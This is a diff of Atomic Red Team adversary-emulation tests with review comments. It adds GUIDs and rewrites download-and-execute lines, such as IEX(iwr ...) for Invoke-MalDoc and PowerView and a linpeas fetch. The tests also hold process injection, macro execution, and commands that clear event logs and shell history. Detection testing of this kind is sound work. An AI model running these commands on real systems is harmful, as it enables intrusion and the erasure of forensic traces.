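T1055.012.md hunk at the end of this chunk, whose hunk continues past the visible lines.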
diff --git a/atomics/T1053.006/T1053.006.md b/atomics/T1053.006/T1053.006.md
index 4df70d46..1c020d8c 100644
--- a/atomics/T1053.006/T1053.006.md
+++ b/atomics/T1053.006/T1053.006.md
@@ -19,10 +19,14 @@ This test creates Systemd service and timer then starts and enables the Systemd
**Supported Platforms:** Linux
+**auto_generated_guid:** f4983098-bb13-44fb-9b2c-46149961807b
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| path_to_systemd_service | Path to systemd service unit file | Path | /etc/systemd/system/art-timer.service|
| path_to_systemd_timer | Path to service timer file | Path | /etc/systemd/system/art-timer.timer|
diff --git a/atomics/T1053.007/T1053.007.md b/atomics/T1053.007/T1053.007.md
index b571a9a7..fc86bcbc 100644
--- a/atomics/T1053.007/T1053.007.md
+++ b/atomics/T1053.007/T1053.007.md
@@ -19,10 +19,14 @@ Kubernetes Job is a controller that creates one or more pods and ensures that a
**Supported Platforms:** Linux, macOS
+**auto_generated_guid:** ddfb0bc1-3c3f-47e9-a298-550ecfefacbd
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| namespace | K8s namespace to list | String | default|
@@ -48,10 +52,14 @@ Kubernetes Job is a controller that creates one or more pods and ensures that a
**Supported Platforms:** Linux, macOS
+**auto_generated_guid:** f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| namespace | K8s namespace to list | String | default|
diff --git a/atomics/T1055.001/T1055.001.md b/atomics/T1055.001/T1055.001.md
index d0e78dc8..c014cfde 100644
--- a/atomics/T1055.001/T1055.001.md
+++ b/atomics/T1055.001/T1055.001.md
@@ -24,10 +24,14 @@ With default arguments, expect to see a MessageBox, with notepad's icon in taskb
**Supported Platforms:** Windows
+**auto_generated_guid:** 74496461-11a1-4982-b439-4d87a550d254
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| process_id | PID of input_arguments | Integer | (Start-Process notepad -PassThru).id|
| dll_payload | DLL to Inject | Path | PathToAtomicsFolder\T1055.001\src\x64\T1055.001.dll|
@@ -48,7 +52,7 @@ mavinject $mypid /INJECTRUNNING #{dll_payload}
##### Description: Utility to inject must exist on disk at specified location (#{dll_payload})
##### Check Prereq Commands:
```powershell
-if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
+if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
diff --git a/atomics/T1055.004/T1055.004.md b/atomics/T1055.004/T1055.004.md
index 9b71ca04..06a329a9 100644
--- a/atomics/T1055.004/T1055.004.md
+++ b/atomics/T1055.004/T1055.004.md
@@ -29,10 +29,14 @@ Upon successful execution, cmd.exe will execute T1055.exe, which exercises 5 tec
**Supported Platforms:** Windows
+**auto_generated_guid:** 611b39b7-e243-4c81-87a4-7145a90358b1
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| exe_binary | Output Binary | Path | PathToAtomicsFolder\T1055.004\bin\T1055.exe|
diff --git a/atomics/T1055.012/T1055.012.md b/atomics/T1055.012/T1055.012.md
index b8770a1b..2df00d31 100644
--- a/atomics/T1055.012/T1055.012.md
+++ b/atomics/T1055.012/T1055.012.md
@@ -22,10 +22,14 @@ Credit to FuzzySecurity (https://github.com/FuzzySecurity/PowerShell-Suite/blob/
**Supported Platforms:** Windows
+**auto_generated_guid:** 562427b4-39ef-4e8c-af88-463a78e70b9c
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| hollow_binary_path | Path of the binary to hollow (executable that will run inside the sponsor) | string | C:\Windows\System32\cmd.exe|
| parent_process_name | Name of the parent process | string | explorer|
@@ -60,10 +64,14 @@ This module executes notepad.exe from within the WINWORD.EXE process
**Supported Platforms:** Windows
+**auto_generated_guid:** 3ad4a037-1598-4136-837c-4027e4fa319b
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| ms_product | Maldoc application Word | String | Word|
@@ -72,7 +80,8 @@ This module executes notepad.exe from within the WINWORD.EXE process
```powershell
-IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1055.012\src\T1055.012-macrocode.txt" -officeProduct "#{ms_product}" -sub "Exploit"
```
@@ -88,7 +97,7 @@ try {
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
Stop-Process -Name $process
exit 0
-} catch { exit 1 }
+} catch { exit 1 }
```
##### Get Prereq Commands:
```powershell
diff --git a/atomics/T1055.012/T1055.012.yaml b/atomics/T1055.012/T1055.012.yaml
index a13bed68..742cd901 100644
--- a/atomics/T1055.012/T1055.012.yaml
+++ b/atomics/T1055.012/T1055.012.yaml
@@ -59,6 +59,7 @@ atomic_tests:
Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
executor:
command: |
- IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+ IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1055.012\src\T1055.012-macrocode.txt" -officeProduct "#{ms_product}" -sub "Exploit"
name: powershell
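Review bot: The executor now fetches Invoke-MalDoc.ps1 from the `master` branch of atomic-red-team and pipes it straight into `IEX`, so the code that runs on the test host is whatever that branch holds at run time rather than what this commit reviewed; the PowerView executors in T1069.002.yaml already pin a commit hash in the raw URL, and the same form (`.../redcanaryco/atomic-red-team/<commit-sha>/atomics/T1204.002/src/Invoke-MalDoc.ps1`) would make this one reproducible. The same unpinned `master` URL is added in both T1059.005.yaml hunks and in T1070.001.yaml, and the AdFind.exe download added to T1069.002.yaml's `get_prereq_command` likewise has no pin or hash check. The `[Net.ServicePointManager]::SecurityProtocol` assignment is process-wide and is not restored after the request; that is harmless in a throwaway shell but worth a one-line comment in the yaml if executors are ever run in a persistent session.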
diff --git a/atomics/T1055/T1055.md b/atomics/T1055/T1055.md
index c1a2510e..24905c99 100644
--- a/atomics/T1055/T1055.md
+++ b/atomics/T1055/T1055.md
@@ -25,6 +25,10 @@ is required.
**Supported Platforms:** Windows
+**auto_generated_guid:** 1c91e740-1729-4329-b779-feba6e71d048
+
+
+
@@ -32,7 +36,8 @@ is required.
```powershell
-IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt" -officeProduct "Word" -sub "Execute"
```
@@ -48,7 +53,7 @@ try {
$path = $wdApp.Path
Stop-Process -Name "winword"
if ($path.contains("(x86)")) { exit 1 } else { exit 0 }
-} catch { exit 1 }
+} catch { exit 1 }
```
##### Get Prereq Commands:
```powershell
@@ -70,10 +75,14 @@ The effect of `/inject` is explained in File -> Account -> About Word
**Supported Platforms:** Windows
+**auto_generated_guid:** e8209d5f-e42d-45e6-9c2f-633ac4f1eefa
+
+
+
@@ -84,7 +92,8 @@ You can validate this by opening WinWord -> File -> Account -> About Word
```powershell
-IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059.005-macrocode.txt" -officeProduct "Word" -sub "Exec"
```
@@ -104,7 +113,7 @@ try {
$path = $wdApp.Path
Stop-Process -Name "winword"
if ($path.contains("(x86)")) { exit 1 } else { exit 0 }
-} catch { exit 1 }
+} catch { exit 1 }
```
##### Get Prereq Commands:
```powershell
@@ -125,10 +134,14 @@ memory location to a file stored in the $env:TEMP\atomic_t1059_005_test_output.b
**Supported Platforms:** Windows
+**auto_generated_guid:** 8faff437-a114-4547-9a60-749652a03df6
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| ms_product | Maldoc application Word | String | Word|
@@ -137,7 +150,8 @@ memory location to a file stored in the $env:TEMP\atomic_t1059_005_test_output.b
```powershell
-IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059_005-macrocode.txt" -officeProduct "Word" -sub "Extract"
```
@@ -157,7 +171,7 @@ try {
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
Stop-Process -Name $process
exit 0
-} catch { exit 1 }
+} catch { exit 1 }
```
##### Get Prereq Commands:
```powershell
diff --git a/atomics/T1059.005/T1059.005.yaml b/atomics/T1059.005/T1059.005.yaml
index df243080..3425d472 100644
--- a/atomics/T1059.005/T1059.005.yaml
+++ b/atomics/T1059.005/T1059.005.yaml
@@ -54,7 +54,8 @@ atomic_tests:
Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement"
executor:
command: |
- IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+ IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059.005-macrocode.txt" -officeProduct "Word" -sub "Exec"
cleanup_command: |
Get-WmiObject win32_process | Where-Object {$_.CommandLine -like "*mshta*"} | % { "$(Stop-Process $_.ProcessID)" } | Out-Null
@@ -88,8 +89,9 @@ atomic_tests:
Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
executor:
command: |
- IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+ IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059_005-macrocode.txt" -officeProduct "Word" -sub "Extract"
cleanup_command: |
Remove-Item "$env:TEMP\atomic_t1059_005_test_output.bin" -ErrorAction Ignore
- name: powershell
\ No newline at end of file
+ name: powershell
diff --git a/atomics/T1059.006/T1059.006.md b/atomics/T1059.006/T1059.006.md
index 01f280d0..db4b1100 100644
--- a/atomics/T1059.006/T1059.006.md
+++ b/atomics/T1059.006/T1059.006.md
@@ -21,10 +21,14 @@ Download and execute shell script and write to file then execute locally using P
**Supported Platforms:** Linux
+**auto_generated_guid:** 3a95cdb2-c6ea-4761-b24e-02b71889b8bb
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| script_url | Shell script public URL | String | https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh|
| payload_file_name | Name of shell script downloaded from the script_url | String | T1059.006-payload|
@@ -51,7 +55,7 @@ rm #{payload_file_name}
##### Check Prereq Commands:
```sh
which_python=`which python`; python -V
-$which_python -c 'import requests' 2>/dev/null; echo $?
+$which_python -c 'import requests' 2>/dev/null; echo $?
```
##### Get Prereq Commands:
```sh
@@ -70,10 +74,14 @@ Create Python file (.py) that downloads and executes shell script via executor a
**Supported Platforms:** Linux
+**auto_generated_guid:** 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| python_script_name | Python script name | Path | T1059.006.py|
| script_url | Shell script public URL | String | https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh|
@@ -111,7 +119,7 @@ rm #{python_script_name} #{payload_file_name}
##### Check Prereq Commands:
```sh
which_python=`which python`; python -V
-$which_python -c 'import requests' 2>/dev/null; echo $?
+$which_python -c 'import requests' 2>/dev/null; echo $?
```
##### Get Prereq Commands:
```sh
@@ -130,10 +138,14 @@ Create Python file (.py) then compile to binary (.pyc) that downloads an externa
**Supported Platforms:** Linux
+**auto_generated_guid:** 0b44d79b-570a-4b27-a31f-3bf2156e5eaa
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| python_script_name | Name of Python script name | Path | T1059.006.py|
| script_url | URL hosting external malicious payload | String | https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh|
@@ -173,7 +185,7 @@ rm #{python_binary_name} #{python_script_name} #{payload_file_name}
##### Check Prereq Commands:
```sh
which_python=`which python`; python -V
-$which_python -c 'import requests' 2>/dev/null; echo $?
+$which_python -c 'import requests' 2>/dev/null; echo $?
```
##### Get Prereq Commands:
```sh
diff --git a/atomics/T1069.001/T1069.001.md b/atomics/T1069.001/T1069.001.md
index 55a48f28..56654c95 100644
--- a/atomics/T1069.001/T1069.001.md
+++ b/atomics/T1069.001/T1069.001.md
@@ -21,6 +21,10 @@ Permission Groups Discovery
**Supported Platforms:** macOS, Linux
+**auto_generated_guid:** 952931a4-af0b-4335-bbbe-73c8c5b327ae
+
+
+
@@ -48,6 +52,10 @@ information will be displayed.
**Supported Platforms:** Windows
+**auto_generated_guid:** 1f454dd6-e134-44df-bebb-67de70fb6cd8
+
+
+
@@ -74,6 +82,10 @@ information will be displayed.
**Supported Platforms:** Windows
+**auto_generated_guid:** a580462d-2c19-4bc7-8b9a-57a41b7d3ba4
+
+
+
diff --git a/atomics/T1069.002/T1069.002.md b/atomics/T1069.002/T1069.002.md
index 2eeb4a9f..2ea99ae1 100644
--- a/atomics/T1069.002/T1069.002.md
+++ b/atomics/T1069.002/T1069.002.md
@@ -32,6 +32,10 @@ information will be displayed.
**Supported Platforms:** Windows
+**auto_generated_guid:** dd66d77d-8998-48c0-8024-df263dc2ce5d
+
+
+
@@ -60,10 +64,14 @@ information will be displayed.
**Supported Platforms:** Windows
+**auto_generated_guid:** 6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| user | User to identify what groups a user is a member of | string | administrator|
@@ -90,6 +98,10 @@ test will display some errors if run on a computer not connected to a domain. Up
**Supported Platforms:** Windows
+**auto_generated_guid:** 0afb5163-8181-432e-9405-4322710c0c37
+
+
+
@@ -117,6 +129,10 @@ Find machines where user has local admin access (PowerView). Upon execution, pro
**Supported Platforms:** Windows
+**auto_generated_guid:** a2d71eee-a353-4232-9f86-54f4288dd8c1
+
+
+
@@ -124,6 +140,7 @@ Find machines where user has local admin access (PowerView). Upon execution, pro
```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-LocalAdminAccess -Verbose
```
@@ -141,6 +158,10 @@ Enumerates members of the local Administrators groups across all machines in the
**Supported Platforms:** Windows
+**auto_generated_guid:** a5f0d9f8-d3c9-46c0-8378-846ddd6b1cbd
+
+
+
@@ -148,6 +169,7 @@ Enumerates members of the local Administrators groups across all machines in the
```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-EnumerateLocalAdmin -Verbose
```
@@ -165,10 +187,14 @@ takes a computer and determines who has admin rights over it through GPO enumera
**Supported Platforms:** Windows
+**auto_generated_guid:** 64fdb43b-5259-467a-b000-1b02c00e510a
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| computer_name | hostname of the computer to analyze | Path | $env:COMPUTERNAME|
@@ -177,7 +203,8 @@ takes a computer and determines who has admin rights over it through GPO enumera
```powershell
-IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose"
```
@@ -194,6 +221,10 @@ When successful, accounts that do not require kerberos pre-auth will be returned
**Supported Platforms:** Windows
+**auto_generated_guid:** 870ba71e-6858-4f6d-895c-bb6237f6121b
+
+
+
@@ -211,7 +242,7 @@ get-aduser -f * -pr DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth -eq
##### Description: Computer must be domain joined.
##### Check Prereq Commands:
```powershell
-if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}
+if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -220,7 +251,7 @@ Write-Host Joining this computer to a domain must be done manually.
##### Description: Requires the Active Directory module for powershell to be installed.
##### Check Prereq Commands:
```powershell
-if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1}
+if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -240,10 +271,14 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c
**Supported Platforms:** Windows
+**auto_generated_guid:** 48ddc687-82af-40b7-8472-ff1e742e8274
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| adfind_path | Path to the AdFind executable | Path | PathToAtomicsFolder\T1087.002\src\AdFind.exe|
@@ -262,10 +297,11 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c
##### Description: AdFind.exe must exist on disk at specified location (#{adfind_path})
##### Check Prereq Commands:
```powershell
-if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
+if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
```
diff --git a/atomics/T1069.002/T1069.002.yaml b/atomics/T1069.002/T1069.002.yaml
index 84f64dda..193d79de 100644
--- a/atomics/T1069.002/T1069.002.yaml
+++ b/atomics/T1069.002/T1069.002.yaml
@@ -53,6 +53,7 @@ atomic_tests:
- windows
executor:
command: |
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-LocalAdminAccess -Verbose
name: powershell
- name: Find local admins on all machines in domain (PowerView)
@@ -63,6 +64,7 @@ atomic_tests:
- windows
executor:
command: |
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-EnumerateLocalAdmin -Verbose
name: powershell
- name: Find Local Admins via Group Policy (PowerView)
@@ -77,7 +79,9 @@ atomic_tests:
type: Path
default: $env:COMPUTERNAME
executor:
- command: "IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose"
+ command: |
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+ IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose"
name: powershell
- name: Enumerate Users Not Requiring Pre Auth (ASRepRoast)
auto_generated_guid: 870ba71e-6858-4f6d-895c-bb6237f6121b
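Review bot: The new block scalar keeps the closing `"` that terminated the old double-quoted YAML scalar, so the last command line now ends in `-Verbose"` and PowerShell receives a literal stray quote, which fails the executor on an unterminated string before Find-GPOComputerAdmin runs. Drop the trailing character so the line ends `... Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose`. The generated T1069.002.md in this same commit carries the identical stray quote and will need regenerating once the yaml is corrected.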
@@ -123,6 +127,7 @@ atomic_tests:
prereq_command: |
if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
get_prereq_command: |
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
executor:
command: |
diff --git a/atomics/T1070.001/T1070.001.md b/atomics/T1070.001/T1070.001.md
index 3f420431..cc798f16 100644
--- a/atomics/T1070.001/T1070.001.md
+++ b/atomics/T1070.001/T1070.001.md
@@ -27,10 +27,14 @@ Upon execution this test will clear Windows Event Logs. Open the System.evtx log
**Supported Platforms:** Windows
+**auto_generated_guid:** e6abb60e-26b8-41da-8aae-0c35174b0967
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| log_name | Windows Log Name, ex System | String | System|
@@ -58,6 +62,10 @@ Upon execution, open the Security.evtx logs at C:\Windows\System32\winevt\Logs a
**Supported Platforms:** Windows
+**auto_generated_guid:** b13e9306-3351-4b4b-a6e8-477358b0b498
+
+
+
@@ -86,6 +94,10 @@ Elevation is required for this module to execute properly, otherwise WINWORD wil
**Supported Platforms:** Windows
+**auto_generated_guid:** 1b682d84-f075-4f93-9a89-8a8de19ffd6e
+
+
+
@@ -93,7 +105,8 @@ Elevation is required for this module to execute properly, otherwise WINWORD wil
```powershell
-IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1070.001\src\T1070.001-macrocode.txt" -officeProduct "Word" -sub "ClearLogs"
```
@@ -108,7 +121,7 @@ try {
New-Object -COMObject "Word.Application" | Out-Null
Stop-Process -Name "winword"
exit 0
-} catch { exit 1 }
+} catch { exit 1 }
```
##### Get Prereq Commands:
```powershell
diff --git a/atomics/T1070.001/T1070.001.yaml b/atomics/T1070.001/T1070.001.yaml
index 1a95ff41..fdd29975 100644
--- a/atomics/T1070.001/T1070.001.yaml
+++ b/atomics/T1070.001/T1070.001.yaml
@@ -54,7 +54,8 @@ atomic_tests:
Write-Host "You will need to install Microsoft Word manually to meet this requirement"
executor:
command: |
- IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+ IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1070.001\src\T1070.001-macrocode.txt" -officeProduct "Word" -sub "ClearLogs"
name: powershell
- elevation_required: true
\ No newline at end of file
+ elevation_required: true
diff --git a/atomics/T1070.002/T1070.002.md b/atomics/T1070.002/T1070.002.md
index 9600f758..e75d68d2 100644
--- a/atomics/T1070.002/T1070.002.md
+++ b/atomics/T1070.002/T1070.002.md
@@ -28,6 +28,10 @@ Delete system and audit logs
**Supported Platforms:** macOS, Linux
+**auto_generated_guid:** 989cc1b1-3642-4260-a809-54f9dd559683
+
+
+
@@ -53,10 +57,14 @@ This test overwrites the Linux mail spool of a specified user. This technique wa
**Supported Platforms:** Linux
+**auto_generated_guid:** 1602ff76-ed7f-4c94-b550-2f727b4782d4
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| username | Username of mail spool | String | root|
@@ -82,10 +90,14 @@ This test overwrites the specified log. This technique was used by threat actor
**Supported Platforms:** Linux
+**auto_generated_guid:** d304b2dc-90b4-4465-a650-16ddd503f7b5
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| log_path | Path of specified log | Path | /var/log/secure|
diff --git a/atomics/T1070.003/T1070.003.md b/atomics/T1070.003/T1070.003.md
index f2aa13b5..8d5e8582 100644
--- a/atomics/T1070.003/T1070.003.md
+++ b/atomics/T1070.003/T1070.003.md
@@ -45,6 +45,10 @@ Clears bash history via rm
**Supported Platforms:** Linux, macOS
+**auto_generated_guid:** a934276e-2be5-4a36-93fd-98adbb5bd4fc
+
+
+
@@ -69,6 +73,10 @@ Clears bash history via rm
**Supported Platforms:** Linux
+**auto_generated_guid:** cbf506a5-dd78-43e5-be7e-a46b7c7a0a11
+
+
+
@@ -93,6 +101,10 @@ Clears bash history via cat /dev/null
**Supported Platforms:** Linux, macOS
+**auto_generated_guid:** b1251c35-dcd3-4ea1-86da-36d27b54f31f
+
+
+
@@ -117,6 +129,10 @@ Clears bash history via a symlink to /dev/null
**Supported Platforms:** Linux, macOS
+**auto_generated_guid:** 23d348f3-cc5c-4ba9-bd0a-ae09069f0914
+
+
+
@@ -141,6 +157,10 @@ Clears bash history via truncate
**Supported Platforms:** Linux
+**auto_generated_guid:** 47966a1d-df4f-4078-af65-db6d9aa20739
+
+
+
@@ -165,6 +185,10 @@ Clears the history of a bunch of different shell types by setting the history si
**Supported Platforms:** Linux, macOS
+**auto_generated_guid:** 7e6721df-5f08-4370-9255-f06d8a77af4c
+
+
+
@@ -191,6 +215,10 @@ Clears the history and disable bash history logging of the current shell and fut
**Supported Platforms:** Linux, macOS
+**auto_generated_guid:** 784e4011-bd1a-4ecd-a63a-8feb278512e6
+
+
+
@@ -224,6 +252,10 @@ Using a space before a command causes the command to not be logged in the Bash H
**Supported Platforms:** Linux, macOS
+**auto_generated_guid:** 53b03a54-4529-4992-852d-a00b4b7215a6
+
+
+
@@ -249,6 +281,10 @@ Keeps history clear and stays out of lastlog,wtmp,btmp ssh -T keeps the ssh clie
**Supported Platforms:** Linux
+**auto_generated_guid:** 5f8abd62-f615-43c5-b6be-f780f25790a1
+
+
+
@@ -271,7 +307,7 @@ userdel -f testuser1
##### Check Prereq Commands:
```sh
/usr/sbin/useradd testuser1
-echo pwd101! | passwd testuser1 --stdin
+echo pwd101! | passwd testuser1 --stdin
```
##### Get Prereq Commands:
```sh
@@ -291,6 +327,10 @@ Prevents Powershell history
**Supported Platforms:** Windows
+**auto_generated_guid:** 2f898b81-3e97-4abb-bc3f-a95138988370
+
+
+
@@ -319,6 +359,10 @@ Clears Powershell history
**Supported Platforms:** Windows
+**auto_generated_guid:** da75ae8d-26d6-4483-b0fe-700e4df4f037
+
+
+
